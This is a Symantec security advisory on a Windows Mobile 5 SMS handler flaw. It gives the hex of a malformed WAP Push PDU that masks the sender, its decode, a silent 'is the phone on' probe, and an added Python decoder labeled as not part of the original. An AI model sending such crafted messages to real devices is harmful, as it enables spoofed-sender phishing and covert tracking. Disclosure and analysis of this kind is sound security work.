Microsoft WM5 PocketPC Phone Ed SMS Handler Issue



SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                     Symantec Vulnerability Research
                     http://www.symantec.com/research
                           Security Advisory

   Advisory ID: SYMSA-2007-011
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition
                SMS Handler Issue With Regard to Malformed WAP Push
                Messages Hiding Source
        Author: Ollie Whitehouse / ollie_whitehouse@symantec.com
  Release Date: 17-10-2007
   Application: Microsoft Windows Mobile 5 PocketPC
      Platform: Windows
      Severity: Information Disclosure
 Vendor status: Vendor Reviewed
    CVE Number: CVE-2007-5493
     Reference: http://www.securityfocus.com/bid/26019


Overview:

  Microsoft Windows Mobile 6 is the latest version of Microsoft's
  mobile operating system. Designed for small embedded devices,
  Windows Mobile is the CE feature set designed for PDAs and mobile
  telephones. Microsoft Windows Mobile comes in three distinct
  flavors: Pocket PC, Pocket PC Phone Edition and SmartPhone.

  A vulnerability has been discovered in the SMS handler on
  Windows Mobile 2005 Pocket PC Phone Edition: when the recipient is
  sent a specially crafted WAP PUSH message, the sender of the
  original SMS message can be masked from the recipient.


Details:

  Symantec discovered that a slightly malformed WAP PUSH message
  could be used to hide the originating sender of the message on
  Windows Mobile 2005. The original PDU can be seen in [1]. This
  PDU causes the Pocket PC Phone Edition SMS handler to decode it
  incorrectly, with the result that both the sending telephone
  number and the sending time are incorrect.

  [1] PDU (Line wrapped)
  079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
  AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
  756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
  696C652E636F6D000101

  The decode of the PDU can be seen in [2]. This decode was achieved
  with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message
  is received by a SmartPhone it will be silently discarded, which
  can also be useful to an attacker who wishes to ascertain, through
  SMS delivery receipts, whether a cellphone is on without alerting
  the user.

  [2] Decode of PDU from PDUSpy

  PDU LENGTH IS 118 BYTES
  ADDRESS OF DELIVERING SMSC
    NUMBER IS : +447785016005
    TYPE OF NR. : International
    NPI : ISDN/Telephone (E.164/163)

  MESSAGE HEADER FLAGS
    MESSAGE TYPE : SMS SUBMIT
    REJECT DUPLICATES : NO
    VALIDITY PERIOD : RELATIVE
    REPLY PATH : NO
    USER DATA HEADER : PRESENT
    REQ. STATUS REPORT : NO
    MSG REFERENCE NR. : 34 (0x22)

  DESTINATION ADDRESS
    NUMBER IS : +447716299660
    TYPE OF NR. : International
    NPI : ISDN/Telephone (E.164/163)

  PROTOCOL IDENTIFIER (0x00)
    MESSAGE ENTITIES : SME-to-SME
    PROTOCOL USED : Implicit / SC-specific

  DATA CODING SCHEME (0x04)
    AUTO-DELETION : OFF
    COMPRESSION : OFF
    MESSAGE CLASS : NONE
    ALPHABET USED : 8bit data

  VALIDITY OF MESSAGE : 24.0 hrs

  USER DATA PART OF SM
    USER DATA LENGTH : 96 octets
    UDH LENGTH : 6 octets
    UDH : 05 04 0B 84 23 F0
    UDH ELEMENTS : 05 - Appl. port addressing 16bit
        4 (0x04) Bytes Information Element
        09200 : SOURCE port is: allocated by IANA
        02948 : DESTINATION port is: allocated by IANA
    --- DATA ----------------------
        05 04 0B 84 23 F0
        USER DATA (TEXT) : %=AE=81=EA=AF=82=B4=84jE=C6
        symantec=85Symantec
        bulkSMS (Unregistered Ver) -
        LogixMobile.com


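  The decode in [2] can be reproduced with a short parser. The
  following Python is an added example, not part of the Symantec
  advisory or of PDUSpy; the function names are illustrative, and it
  handles only the layout of PDU [1] (SMS-SUBMIT, relative validity
  period, 8-bit data), flagging user data addressed to the WAP Push
  destination port 2948 shown in the decode.

```python
PDU_HEX = (  # PDU [1] from the advisory, line wrapping removed
    "079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA"
    "AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62"
    "756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62"
    "696C652E636F6D000101"
)
WAP_PUSH_PORT = 2948  # destination port shown in the decode (IANA: wap-push)

def address(toa, octets):
    """Nibble-swapped BCD digits; 0xF pads odd lengths, 0x91 = international."""
    digits = "".join(f"{b & 0x0F:X}{b >> 4:X}" for b in octets).rstrip("F")
    return ("+" if toa == 0x91 else "") + digits

def parse_udh(udh):
    """Split a User Data Header into {IEI: data}, rejecting overruns."""
    elements, i = {}, 0
    while i < len(udh):
        if i + 2 > len(udh) or i + 2 + udh[i + 1] > len(udh):
            raise ValueError("information element overruns UDH")
        elements[udh[i]] = udh[i + 2:i + 2 + udh[i + 1]]
        i += 2 + udh[i + 1]
    return elements

def decode_submit(pdu_hex):
    """Decode an SMS-SUBMIT PDU (relative validity period, 8-bit data)."""
    raw = bytes.fromhex(pdu_hex)
    p = 1 + raw[0]                                   # skip SMSC field
    out = {"pdu_len": len(raw), "smsc": address(raw[1], raw[2:p])}
    first, out["mr"], ndigits, toa = raw[p:p + 4]
    if first & 0x03 != 0x01 or (first >> 3) & 0x03 != 0x02:
        raise ValueError("not an SMS-SUBMIT with relative validity period")
    end = p + 4 + (ndigits + 1) // 2                 # end of destination
    out["dest"] = address(toa, raw[p + 4:end])
    out["pid"], out["dcs"], out["vp"], udl = raw[end:end + 4]
    ud = raw[end + 4:]
    if out["dcs"] != 0x04 or udl != len(ud):
        raise ValueError("expected 8-bit data and UDL == remaining octets")
    out["udl"], payload = udl, ud
    if first & 0x40:                                 # UDHI: header present
        if not ud or 1 + ud[0] > len(ud):
            raise ValueError("UDH length exceeds user data")
        ie = parse_udh(ud[1:1 + ud[0]])
        payload = ud[1 + ud[0]:]
        if len(ie.get(0x05, b"")) == 4:              # 16-bit port addressing
            out["dst_port"] = int.from_bytes(ie[0x05][:2], "big")
            out["src_port"] = int.from_bytes(ie[0x05][2:], "big")
    out["payload"] = payload
    out["wap_push"] = out.get("dst_port") == WAP_PUSH_PORT
    return out
```

  decode_submit(PDU_HEX) returns the same SMSC, destination, message
  reference, user data length and port values that PDUSpy reports
  in [2].
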
Vendor Response:

  A vulnerability has been discovered in the SMS handler. If a
  malicious message with no sender was received by a user on their
  device, the user may be enticed into taking action or clicking the
  URI that could lead to a second order attack.

  Mitigating Factors: By default Windows Mobile device policy requires
  SI messages to be authenticated. The Mobile Operators have the
  ability to change the policy to not require authentication in
  order for 3rd party ring tones and other SI messages.

  Microsoft will look into a different architecture in future versions.


Recommendation:

  Contact your mobile operator to ensure the proper policy is set on
  your device.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


  CVE-2007-5493

- -------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:
research@symantec.com

For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive:
http://www.symantec.com/research/

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

- -------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:
secure@symantec.com

For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

- ---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Consulting Services. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from research@symantec.com.

Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information.

Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies
in the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD
1qhcVHQ07YHEdgF0zUP81/k=
=pFeF
-----END PGP SIGNATURE-----
